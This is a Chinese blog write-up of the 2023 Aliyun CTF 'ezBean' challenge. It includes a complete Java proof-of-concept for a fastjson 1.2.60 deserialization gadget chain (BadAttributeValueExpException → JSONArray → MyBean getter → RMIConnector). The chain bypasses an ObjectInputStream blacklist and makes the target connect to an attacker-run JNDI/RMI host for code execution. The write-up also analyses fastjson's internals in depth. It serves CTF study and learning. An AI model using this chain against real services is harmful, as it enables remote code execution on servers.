[2023阿里云CTF]ezBean复现及相关fastjson机制深入分析

已于 2023-05-18 12:31:31 修改
阅读量570 收藏
点赞数 1
分类专栏: 网络安全 文章标签: 阿里云 jvm java
于 2023-05-18 02:30:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42585535/article/details/130738288
版权

[2023阿里云CTF]ezBean复现及相关fastjson机制深入分析

tip:环境为JDK1.8

本篇文章会讲到:

1.[2023阿里云CTF]ezBean的题目解答

2.fastjson的getter机制深入分析

3.如何利用fastjson与objectInputStream的差异化来绕过黑名单检测机制

ezbean

下载源码,看控制器,只有一个路由/read,接受BASE64编码过的序列化流进行反序列化

@RestController
public class IndexController {
        @RequestMapping("/read")
        public String read(@RequestParam String data) {
            try {
                byte[] bytes = Base64.getDecoder().decode(data);
                ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
                MyObjectInputStream objectInputStream = new MyObjectInputStream(byteArrayInputStream);
                objectInputStream.readObject();
            } catch (Exception e) {
                e.printStackTrace();
                return "error";
            }
            return "success";
        }
}

JAVA反序列化题,先看依赖库,发现有1.2.60版本的fastjson

但是不能直接把payload打进去,因为在反序列化的时候resolveClass方法会检测黑名单

所以还是根据题目环境制定策略

去看MyBean类,发现有getConnect方法,还有JMXConnector成员,并且getConnect方法中会调用JMX的connect方法

去看这个JMX的源码,发现是一个接口,并且是由RMIConnector实现

这里说一下JMX和RMI的关系:

JMX 是 Java 的一种技术和标准,它用于监控和管理 Java 应用程序、对象、设备和服务。JMX 的主要部分是 MBean (Managed Bean),它是一种特殊的 JavaBean,包含了一些用于远程管理的接口。

RMI 是 Java 的一种技术,允许在 JVM 之间进行远程方法调用。这意味着在一个 JVM 中运行的对象可以调用另一个 JVM 中运行的对象的方法,就像它们在同一个 JVM 中一样。

JMX 和 RMI 的关系体现在,JMX 使用 RMI 作为其默认的远程传输协议,可以在网络上的不同 JVM 之间进行通信。

JMXConnector 是一个接口,它定义了客户端如何连接到 JMX 服务的方法。这些方法中包括 connect()

RMIConnector 是 JMXConnector的一个实现,它使用 RMI 协议来进行网络通信。这意味着,当你使用 RMIConnector 创建一个连接时,你实际上是在使用 RMI 协议连接到 JMX 服务。

所以这里我们的思路就出来了,想办法使得服务端反序列化我们的payload之后,能够调用RMI远程连接到我们的vps上进行利用

达到这个目标需要两个条件:

1.目标服务端调用getConnect

2.控制JMX对象使其rmi连接到我们的vps的恶意rmi

为了达到这两个目标,最终POC如下(此POC源自:杭师大网安的WP)

import com.alibaba.fastjson.JSONArray;
import com.ctf.ezser.bean.MyBean;

import javax.management.BadAttributeValueExpException;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXServiceURL;
import javax.management.remote.rmi.RMIConnector;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.net.URLEncoder;
import java.util.Base64;

public class demo {
    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException {
        JMXServiceURL url =new JMXServiceURL("service:jmx:rmi:///jndi/rmi://192.168.40.128:1099/nrf8qi");
        JMXConnector rmi = new RMIConnector(url,null);
        MyBean myBean = new MyBean("123","123",rmi);
        JSONArray jsonArray =new JSONArray();
        jsonArray.add(myBean);
        BadAttributeValueExpException val =new BadAttributeValueExpException(null);
        Field field = val.getClass().getDeclaredField("val");
        field.setAccessible(true);
        field.set(val,jsonArray);

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream =new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(val);

        System.out.println(URLEncoder.encode(new String(Base64.getEncoder().encode(byteArrayOutputStream.toByteArray())),"UTF-8"));
    }
}

分析一下POC:

首先构造JMXConnector对象,实现类为RMIConnector,构造函数需要一个JMXServiceURL,这里我们提前开一个恶意RMI服务

我们需要构造MyBean,但面临两个安全限制

1.fastjson默认禁用autotype,也就是说不能反序列化带有类型@type的信息,也就是对象

2.resolveClass禁用了java.rmi包,无法直接反序列化MyBean(这里对mybean的正则匹配的是com.ctf…(后面任意数量的点,所以mybean不受影响))

对于第一点:因为之前没接触过fastjson,所以autotype机制没有了解过,于是各种调试跟踪,发现个很奇怪的点,就是autotype默认应该是关闭的,但在Parser.class中,决定autotype是否开启的autoTypeSupport却在逻辑运算后为true,那么这个默认关闭的autotype又有什么意义呢?(有师傅懂得话希望得到解答-)

//相关代码如下,师傅们可自行探究
//Parser.class
boolean autoTypeSupport = this.autoTypeSupport || (features & mask) != 0 || (JSON.DEFAULT_PARSER_FEATURE & mask) != 0;//这里autoTypeSupport在执行时会设置为true
if (clazz == null && (autoTypeSupport || jsonType || expectClassFlag)) {
    boolean cacheClass = autoTypeSupport || jsonType;
    clazz = TypeUtils.loadClass(typeName, this.defaultClassLoader, cacheClass);
}

对于第二点绕过,就是把黑名单类往json里扔,原理可以用一张报错的堆栈图说明

题目设置的黑名单只针对ObjectInputStream,而我们把RMIconnetor类扔到fastjson后,fastjson会接过这个反序列化的任务,而题目并没有针对fastjson的反序列化进行黑名单检测,所以成功绕过

然后是

 BadAttributeValueExpException val =new BadAttributeValueExpException(null);
        Field field = val.getClass().getDeclaredField("val");
        field.setAccessible(true);
        field.set(val,jsonArray);

这段是一个java反序列化攻击常用的一个类,因为这个类在反序列化时会自动调用一个名为val的私有成员的toString方法

这里把val设置成存储了构造好的MyBean对象的JSONArray对象,所以当反序列化时会自动调压JSONArray的toString方法

跟进JSONArray源码,其父类JSON有toString方法,调用toJSONString

public String toJSONString() {
    SerializeWriter out = new SerializeWriter();

    String var2;
    try {
        (new JSONSerializer(out)).write(this);
        var2 = out.toString();
    } finally {
        out.close();
    }

    return var2;
}

(new JSONSerializer(out)).write(this)会根据对象的类型返回合适的序列化器,之后会使用这个序列化器将JSON里的存储的对象序列化为JSON字符串,这里我们打断点调试,可以看出,fastjson为我们选择的是ListSerializer(因为需要序列化的是JSONArray,是List类型)

跟进ListSerializer的write方法,

其中这一块

try {
    int i;
    Object item;
    .......
 finally {
                    serializer.context = context;
                }

serializer.getObjectWriter是根据JSONArray的每一个元素选择不同的序列化器

慢慢调试,可以看到这里给我们选择的是ASMSerializer序列化器,并且已经获取到了MyBean对象的所有getter,这里是一个非常关键的地方,就是序列化器会获取对象所有的以getXxxxx这种格式的方法,即使它不是一个真正的getter,但只要符合这种命名规范的方法都会被序列化器认为是getter

我们可以在MyBean里加一个方法来试验一下

public Object getConnect(){
    System.out.println("getConnect!!");
    return null;
}

然后调试,可以看到即使不存在一个connect变量,但依然被认定这个方法是一个名为connect成员的getter

接着用ASM序列化器对MyBean进行序列化,但由于ASM序列化器是运行时动态生成的,所以我们无法看到源码,但是这个ASM序列化器是由ASMSerializerFactory类中的方法动态生成的,具体可以参考ASMSerializerFactory的源码。这个工厂类中的

createJavaBeanSerializer()方法使用了ASM库来动态生成JavaBeanSerializer

也就是说,ASM序列化器是用ASM字节码技术动态生成的一系列序列化器,本质是在JavaBeanSerializer的基础上进行了改进,所以核心功能和JavaBeanSerializer其实差不多,为了解释清楚基本原理,我们就跟进JavaBeanSerializer,并且对于一般java对象,默认使用的是JavaBeanSerializer

JavaBeanSerializer在序列化Java对象时,会遍历并调用对象的getter方法。这个过程主要在JavaBeanSerializer的构造函数以及getFieldValuesMap方法中实现。

跟进JavaBeanSerializer,分析一下

首先,依次通过三个构造函数来构建一个beanInfo,最后一个构造函数对beanInfo进行处理

public JavaBeanSerializer(Class<?> beanType) {
    this(beanType, (Map)null);
}

public JavaBeanSerializer(Class<?> beanType, String... aliasList) {
    this(beanType, createAliasMap(aliasList));
}
public JavaBeanSerializer(Class<?> beanType, Map<String, String> aliasMap) {
	this(TypeUtils.buildBeanInfo(beanType, aliasMap, (PropertyNamingStrategy)null));
}
 public JavaBeanSerializer(SerializeBeanInfo beanInfo) {
        this.beanInfo = beanInfo;
        this.sortedGetters = new FieldSerializer[beanInfo.sortedFields.length];
        ..........
        ..........

beanInfoSerializeBeanInfo类型的对象,它保存了有关Java Bean(在这里为MyBean)的所有信息,包括类的结构、属性、getter和setter方法等。这些信息在创建JavaBeanSerializer时被收集并保存在beanInfo对象中,以便在后续的序列化过程中使用。

 this.sortedGetters = new FieldSerializer[beanInfo.sortedFields.length];

这个代码创建了一一系列FieldSerializer对象,每个对象代表一个bean字段,

跟进FieldSerializer

getPropertyValueDirect方法会对每一个字段调用对应的getter

public Object getPropertyValueDirect(Object object) throws InvocationTargetException, IllegalAccessException {
    Object fieldValue = this.fieldInfo.get(object);
    return this.persistenceXToMany && !TypeUtils.isHibernateInitialized(fieldValue) ? null : fieldValue;
}

this.fieldInfo.get方法调用了getter

继续跟进FieldInfo类,

最终在这里通过反射调用了对应字段的getter方法,也就实现了触发getConnect(),至此两个目标都达成了,

分析完后,最终发送生成的payload(要发送三次),这里我本地演示弹出calc

最终执行过程:

objectInputStream.readObject()->BadAttributeValueExpException.readObject()->JSON.toString()->toJSONString()->new JSONSerializer(out)).write(this)->ListSerializer.write->itemSerializer.write(serializer, item, i, elementType, features)->ASMSerilizer遍历每个成员并调用getter->getConnect()->RMIconnector->连接恶意rmi服务->执行恶意代码

思考:

思考:

举一反三:

虽然MyBean类并没有被过滤,但由于我们需要调用其getConnect方法,需要借助JSON的getter机制,所以还是将mybean扔进json中,但对于RMIConnector,为了绕过黑名单,还是需要扔进JSON,这就是题目给出fastjson的目的吧

为什么要发送三次?

这篇文章写了2天,其中花了一天时间都在研究这个问题…

通过不断的调试,本人算是大概摸到了一点门道,但不一定完全正确

fastjson为了提高反序列化效率,在进行反序列化的时候会有一张map,这张map存储的是基本java类,充当一个缓存作用(这也说明了为什么基本数据类型都可以直接反序列化,因为这map中都存了这些类)

//ParserConfig.class
if (clazz == null) {
               clazz = TypeUtils.getClassFromMapping(typeName);//获取map中存储的java类,如果不存在,则返回null
                }    
//TypeUtils.class
public static Class<?> getClassFromMapping(String className) {
        return (Class)mappings.get(className);
    }

因此,当fastjson准备反序列化一个对象的时候,会先判断这个类是否在map表中,如果是,则直接反序列化;

否则,将这个类加入到map表,然后判断这个类是否存在无参构造函数,这是因为fastjson在反序列化当中构建一个对象时,会先获取其默认(无参)构造函数来构建一个对象,然后再使用setter来进行字段填充,而RMIConnector和JMXServiceURL都没有无参构造函数,所以会发生报错

//ParserConfig.class
if (clazz == null) {
    clazz = TypeUtils.getClassFromMapping(typeName);
}

if (clazz == null) {
    clazz = this.deserializers.findClass(typeName);
}

if (clazz == null) {
    clazz = (Class)this.typeMapping.get(typeName);
}

if (clazz != null) {
    if (expectClass != null && clazz != HashMap.class && !expectClass.isAssignableFrom(clazz)) {
        throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());
    } else {
        return clazz;

if (paramNames == null || types.length != paramNames.length) {
    throw new JSONException("default constructor not found. " + clazz);
}

但是为什么在第三次发送时就成功了呢?

这是因为,fastjson是先将类存到map中,然后再执行无参构造的判断,所以我们这三次的效果分别就是:

1.将RMIConnector存入map,这样下次直接就可以反序列化而不必再进行无参构造的判断

2.将JMXService存入map,目的同上

3.所有用到的类均已存入map,执行反序列化成功

小白Lanb0
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
fastjson反序列化0day漏洞分析
bluemoon_0的博客
01-10 425
fastjson反序列化0day漏洞分析
阿里云CTF2023 字节码跳动 wp (javascript字节码)
weixin_42100211的博客
04-23 1182
我的第一道javascript字节码逆向。
fastjson 序列化 不包括转义字符_CTFweb类型(二十二)反序列化的基本概念、魔术方法及相关例题讲解...
weixin_39608116的博客
11-04 351
点击上方蓝色字体,关注我们反序列化的特征有点类似于命令执行,首先要理解反序列化的概念以及它的场景,像CTF中看到某些特征的时候,可以猜测这道题目是否做反序列化。我们先来理解一下这个概念,反序列化和序列化它其实是对应的就是一个数据的持久化和非持久化的一个过程。就是说一开始我们就是一个变量,去申请一个变量,这个变量其实你要把它保存下来的时候怎么保存?比如说我在这边一个php > $a的...
2024阿里云ctf-web-chain17学习
最新发布
A345545108的博客
05-05 992
我们寻找一条到pojonode#toString的链子, 但是Hessian 的反序列化受module的影响,但是原生的反序列化并不受module 的影响,所以hessian后面就要用到Bean的原生反序列化了。设置_sbuf的长度为0,设置_chunkLength长度为25,也就是cn.hutool.json.JSONObject的长度。也就是读完类名的值,也就是8,8也就是我们key的长度,再次反序列化,将offset的值就到。第二条的trace一直没加载进去,很奇怪,原生类序列化能不能打进去呢。
GDCTF2023 web wp
m0_63441547的博客
04-16 468
显然考察的是ssti的知识,过滤了很多东西我就不一个个试了,这道题目跟ctfshow里面的ssti369很类似,大家可以去看看,我推荐这篇文章。修改得分处score,因为是除号,所以要把值1000改得小一点,这样我们得到的分数就会很大。(2).cookie传参,可以下载一些插件,比如cookie-editor。数组,在加密数组的时候会返回NULL,所以我们可以post传入两个数组。小白作者的第一篇博客,不会写,各位佬轻喷(😂~~~),写的很详细很清楚,我在这就不罗嗦了直接打。(1). 由于md5不能。
Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )
YakProject的博客
06-19 369
这是因为在调用 checkAutoType 函数时我们传入的最后一个参数为 Feature.SupportAutoType.mask 而我们进行比较时用的是 feature & Feature.SupportAutoType.mask ,这里 feature 就是我们传入的 Feature.SupportAutoType.mask,这样就相当于传入了开启 autoType 的选项。这里遍历了全部构造函数,寻找符合要求的构造函数,都找不到所以报错,这里阅读逻辑后发和顺序没有关系,因为。
阿里云ctf比赛writeup
04-26
阿里云CTF比赛Writeup详解 在网络安全领域,Capture The Flag(CTF)是一种常见的竞赛形式,参赛者通过解决各种安全挑战来展示他们的技术能力。阿里云CTF比赛提供了多种类型的挑战,包括Web、Misc、Pwn、Reverse和...
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发cyberchef新用法
记录ctf解题过程及脚本.zip
10-25
记录ctf解题过程及脚本
CTF理论考核题及答案 ctf题库
02-21
CTF理论考核题及答案 ctf题库 1.readme.txt中哪一部分是扩展名 A、readme B、readme. C、.txt D、me.txt 参考答案:C 2.关于html语言,描述错误的有 A、html语言不区分大小写 B、浏览器可以直接解释执行html代码 C...
阿里云ecs服务器搭建CTFd(ubuntu20)
weixin_51387754的博客
02-10 956
CTFd is a Capture The Flag framework focusing on ease of use and customizability. It comes with everything you need to run a CTF and it's easy to customize with plugins and themes.
阿里云服务器使用docker搭建ctfd平台
tzyyyyyy的博客
01-17 1205
阿里云服务器使用docker搭建ctfd平台 完成ctfd平台部署
2021-6-8:参加CTF校赛的WP
Hammers_12的博客
06-08 1636
一、Sign_in 简单web题 正常思路先看一下源码 按F12 后看到答案 二、签到 简单Misc题 打开以后 看到有问题和文件夹可以选择 直接选到底 直接得到flag 三、简单题 Reverse简单题 直接打开附件 给出附件为getflag.c文件, 可以看出,flag即为FJZ{1jf11dm4hpns9k0wk2s}的解密 char *caesar_f(char * passwd) { int i,j...
2022年暑期CTF刷题WP(停止更新)
qq_52820087的博客
06-19 3549
2022年暑期CTF刷题之路
Fastjson远程代码执行漏洞通告
爱国小白帽
05-28 2520
Fastjson远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年05月28日, 360CERT监测发业内安全厂商发布了Fastjson远程代码执行漏洞的风险通告,漏洞等级:高危。 Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。 Fastjson存在远程代码执行漏洞,autotype
初识Fastjson漏洞(环境搭建及漏洞
蚁景网安学院
06-29 3135
目前网上的资源整理不是针对入门玩家,都需要一定的java漏洞调试基础,本文从一个简单的FastJson 漏洞开始,搭建漏洞环境,分析漏洞成因,使用条件等。从入门者的角度看懂并漏洞触发...
Fastjson反序列化漏洞分析
热门推荐
fly小灰灰的专栏
07-30 1万+
1. 漏洞描述 漏洞简述: 2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 影响版本: fastjson <= 1.2.24 2. 漏洞简介  java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjson,fastj
java执行脚本语言demo
Coder_android
11-11 1029
public class Test { /** * @param args * @throws IOException  */ public static void main(String[] args) throws IOException { // TODO Auto-generated method stub Process  process = Runtime.get

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值